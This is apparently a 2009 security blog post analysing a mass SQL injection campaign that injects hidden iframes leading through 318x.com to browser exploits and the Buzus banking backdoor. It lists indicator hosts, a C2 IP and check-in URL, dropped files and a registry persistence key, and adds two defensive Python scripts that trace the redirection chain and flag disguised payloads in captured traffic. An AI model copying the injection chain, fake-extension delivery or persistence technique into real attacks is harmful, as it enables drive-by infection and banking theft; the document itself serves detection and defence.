318x SQL Injection Claims 125,000+
A SQL injection attack that began in late November has so far compromised over 125,000 Web pages, judging by a Google search for the injected iframe. Yesterday the same search returned 121,000, so the count appears to be growing. The injected iframe loads the first stage of malicious content from 318x.com. A series of iframes and code redirections (invisible to the user) then ensues, culminating in a rather curious method for managing the final payload (the actual malware delivery).
When users visit a compromised Web page, the injected iframe executes a script that creates a new iframe pointing to 318x.com/a.htm. That iframe (a.htm) does two things:
- Loads a second iframe from aa1100.2288.org/htmlasp/dasp/alt.html;
- Loads a script: js.tongji.linezing.com/1358779/tongji.js (used for tracking).
The aa1100.2288.org/htmlasp/dasp/alt.html iframe then:
- Creates a third iframe pointing to aa1100.2288.org/htmlasp/dasp/share.html;
- Loads a script: js.tongji.linezing.com/1364067/tongji.js (similar to above, but different tracking number);
- Inside a <noscript> block, carries a link (href) to www.linezing.com wrapping an image whose src is img.tongji.linezing.com/1364067/tongji.gif, the tracker's fallback for browsers with scripting disabled.
All fairly common techniques. But once it gets to share.html, things get interesting. As its name implies, share.html acts as a master file that includes the other components of the attack. Over a dozen further script files are pulled in through a convoluted chain of iframes and src references, selected largely by browser type, Flash version, and related criteria.
The attack appears to be a work in progress: while we have been monitoring the scripts used in the final-stage attacks, some have been changed, some removed, and new ones introduced. Many of the files carry .jpg extensions, but all of them are simply JavaScript. Interestingly, the one thing we would most expect to see has not yet appeared during our investigation: the now almost obligatory PDF exploits. Instead, the attacker is focusing on a rather odd assortment:
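The chain above can be followed and flagged without touching the live hosts. The script below is an added example, not code from the original post or from the attacker's pages: it parses each page for iframe, script and img sources (including iframes that an inline script emits with document.write), marks the ones that are hidden, and checks every hop against the hostnames named in this post. The victim URL, the page bodies and the hidden-iframe attributes (width/height 0, display:none) are constructed assumptions; only the hostnames and paths come from the post.

```python
"""Walk an injected-iframe redirection chain offline and flag each hop.

Added example, not code from the original post. Hostnames and paths are the
ones the post names; the victim URL, page bodies and hidden-iframe attributes
are constructed so the chain can be followed with no network access.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hosts named in the post; any element resolving to one is part of the chain.
IOC_HOSTS = {"318x.com", "aa1100.2288.org",
             "js.tongji.linezing.com", "img.tongji.linezing.com"}
HIDDEN_STYLE = ("display:none", "visibility:hidden")


class RefExtractor(HTMLParser):
    """Collect iframe/script/img sources and whether each element is hidden.
    Inline script text is scanned for iframes written as markup strings."""

    def __init__(self, base):
        super().__init__()
        self.base = base
        self.in_script = False
        self.refs = []  # (tag, absolute url, hidden)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        self.in_script = tag == "script"
        if tag not in ("iframe", "script", "img") or not a.get("src"):
            return
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                  or any(s in style for s in HIDDEN_STYLE))
        self.refs.append((tag, urljoin(self.base, a["src"]), hidden))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if not self.in_script:
            return
        for m in re.finditer(r"<iframe\b([^>]*)>", data, re.I):
            attrs = m.group(1)
            src = re.search(r"""src=["']?([^"'\s>]+)""", attrs, re.I)
            if src:
                hidden = bool(re.search(r"""(width|height)=["']?0\b""", attrs, re.I))
                self.refs.append(("iframe", urljoin(self.base, src.group(1)), hidden))


def extract_refs(url, html):
    p = RefExtractor(url)
    p.feed(html)
    p.close()
    return p.refs


def is_ioc(url):
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in IOC_HOSTS)


def walk_chain(start_url, fetch, max_depth=8):
    """Follow iframe/script references from start_url; fetch(url) -> html or None.
    Returns hops as (depth, tag, url, hidden, ioc); visited URLs and a depth cap
    keep a looping chain from running forever."""
    hops, seen, stack = [], {start_url}, [(0, start_url)]
    while stack:
        depth, url = stack.pop()
        html = fetch(url)
        if html is None or depth >= max_depth:
            continue
        for tag, ref, hidden in extract_refs(url, html):
            hops.append((depth + 1, tag, ref, hidden, is_ioc(ref)))
            if tag in ("iframe", "script") and ref not in seen:
                seen.add(ref)
                stack.append((depth + 1, ref))
    return hops


# Constructed pages modelling the chain in the post (bodies are assumptions).
PAGES = {
    "http://victim.example/page.asp":
        '<html><body><h1>Products</h1><iframe src="http://318x.com/" '
        'width="0" height="0"></iframe></body></html>',
    "http://318x.com/":
        "<script>document.write('<iframe src=\"http://318x.com/a.htm\" "
        "width=0 height=0></iframe>');</script>",
    "http://318x.com/a.htm":
        '<iframe src="http://aa1100.2288.org/htmlasp/dasp/alt.html" style="display: none">'
        '</iframe><script src="http://js.tongji.linezing.com/1358779/tongji.js"></script>',
    "http://aa1100.2288.org/htmlasp/dasp/alt.html":
        '<iframe src="share.html" width="0" height="0"></iframe>'
        '<script src="http://js.tongji.linezing.com/1364067/tongji.js"></script>'
        '<noscript><a href="http://www.linezing.com"><img '
        'src="http://img.tongji.linezing.com/1364067/tongji.gif"></a></noscript>',
}

if __name__ == "__main__":
    for depth, tag, url, hidden, ioc in walk_chain("http://victim.example/page.asp", PAGES.get):
        print(f"{'  ' * depth}{tag:6} {url}  hidden={hidden} ioc={ioc}")
```

Replacing PAGES.get with a real fetcher turns this into a crawler for the compromised pages; the hidden flag matters because a 0x0 or display:none iframe pointing off-site is a strong signal even when the destination host is not yet on any list.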
- Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
- MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
- Microsoft Office Web Components vulnerabilities described in MS09-043
- Microsoft video ActiveX vulnerability described in MS09-032
- Internet Explorer uninitialized memory corruption vulnerability described in MS09-002
A successful exploit leads to the silent installation of Backdoor.Win32.Buzus.croo from windowssp.7766.org. Keeping with the phony-extension ruse, the binary is delivered as a .css file. Once on the system, the rootkit-enabled Buzus.croo drops the following files:
- %UserProfile%\ammxv.drv
- %ProgramFiles%\Common Files\Syesm.exe
The trojan then creates a service named DrvKiller in the Registry so that it loads each time Windows starts:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DrvKiller
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DrvKiller\Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\DrvKiller
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\DrvKiller\Security
Backdoor.Win32.Buzus.croo then attempts to contact 121.14.136.5 via port 80 and sends a POST request to hxxp://dns.winsdown.com.cn/Countdown/count.asp.
Trojans in the Buzus family are typically controlled remotely through an IRC backdoor and are used for credit card and other banking-related theft.
Detection of the trojan is spotty: 22 of 40 antivirus engines detected the variant on VirusTotal at the time of writing.
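The network side of this infection is easier to catch than the binary: the fake extensions (.jpg files that are JavaScript, a .css that is a Windows executable), the delivery host and the check-in POST all show up in proxy or packet captures. The script below is an added example, not code from the original post: it sniffs the leading bytes of each response against what the URL extension promises and matches the hosts, IP and check-in URL given above. The record shape and every sample record are constructed; the .jpg path on the share.html host and the .css filename are assumptions, since the post gives neither.

```python
"""Flag the post-exploitation indicators named above in captured HTTP traffic.

Added example, not code from the original post. Record shape and samples are
constructed; the hosts, IP, check-in URL and fake-extension trick are the
ones the post describes.
"""
import os
import re
from urllib.parse import urlparse

# Indicators from the post.
IOC_HOSTS = {"318x.com", "aa1100.2288.org", "windowssp.7766.org", "dns.winsdown.com.cn"}
IOC_IPS = {"121.14.136.5"}
C2_CHECKIN = ("dns.winsdown.com.cn", "/Countdown/count.asp")

# Tokens that mark a text body as JavaScript rather than an image or stylesheet.
JS_TOKENS = re.compile(rb"(document\.write|eval\(|unescape\(|\bvar\s|\bfunction\b)")


def sniff(body):
    """Coarse type of a response from its leading bytes, or 'unknown'."""
    if body[:2] == b"MZ":
        return "pe"
    if body[:3] == b"\xff\xd8\xff":
        return "jpeg"
    if body[:4] == b"GIF8":
        return "gif"
    if body[:8] == b"\x89PNG\r\n\x1a\n":
        return "png"
    if JS_TOKENS.search(body[:512]):
        return "javascript"
    return "unknown"


# Type the URL extension promises; a positive sniff for anything else is a lie.
EXPECTED = {".jpg": "jpeg", ".jpeg": "jpeg", ".gif": "gif", ".png": "png",
            ".js": "javascript", ".css": "css"}


def check_record(rec):
    """Return the alert tags raised by one record (empty list if clean)."""
    alerts = []
    u = urlparse(rec["url"])
    host = (u.hostname or "").lower()
    if host in IOC_HOSTS:
        alerts.append("ioc-host:" + host)
    if rec["dst_ip"] in IOC_IPS:
        alerts.append("ioc-ip:" + rec["dst_ip"])
    if rec["method"] == "POST" and (host, u.path) == C2_CHECKIN:
        alerts.append("c2-checkin")
    ext = os.path.splitext(u.path)[1].lower()
    kind = sniff(rec["body"])
    if ext in EXPECTED and kind != "unknown" and kind != EXPECTED[ext]:
        alerts.append(f"extension-mismatch:{ext}-is-{kind}")
    return alerts


def scan(records):
    """Return [(url, alerts)] for every record that raised at least one alert."""
    out = []
    for rec in records:
        alerts = check_record(rec)
        if alerts:
            out.append((rec["url"], alerts))
    return out


# Constructed sample traffic, not real captures. The x1.jpg path and the
# style.css name are assumptions; the post names neither.
SAMPLE = [
    {"method": "GET", "url": "http://aa1100.2288.org/htmlasp/dasp/x1.jpg",
     "dst_ip": "203.0.113.10",
     "body": b"var sc=unescape('%u9090%u9090');document.write('<iframe src=\"h\"></iframe>');"},
    {"method": "GET", "url": "http://windowssp.7766.org/style.css",
     "dst_ip": "203.0.113.11", "body": b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00"},
    {"method": "POST", "url": "http://dns.winsdown.com.cn/Countdown/count.asp",
     "dst_ip": "121.14.136.5", "body": b"<html>ok</html>"},
    {"method": "GET", "url": "http://www.example.org/logo.jpg",
     "dst_ip": "198.51.100.5", "body": b"\xff\xd8\xff\xe0\x00\x10JFIF"},
    {"method": "GET", "url": "http://www.example.org/site.css",
     "dst_ip": "198.51.100.5", "body": b"body { margin: 0; }"},
]

if __name__ == "__main__":
    for url, alerts in scan(SAMPLE):
        print(url, "->", ", ".join(alerts))
```

The extension-mismatch rule is the durable part: hosts and IPs in this campaign change as the attacker rotates infrastructure, but a .css answered with an MZ header or a .jpg that starts with unescape( is wrong on any site and needs no indicator list.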

Mary Landesman
Reader Comments (1)
Grown to 215,000 as of 2009-12-12 @ 21:51 UTC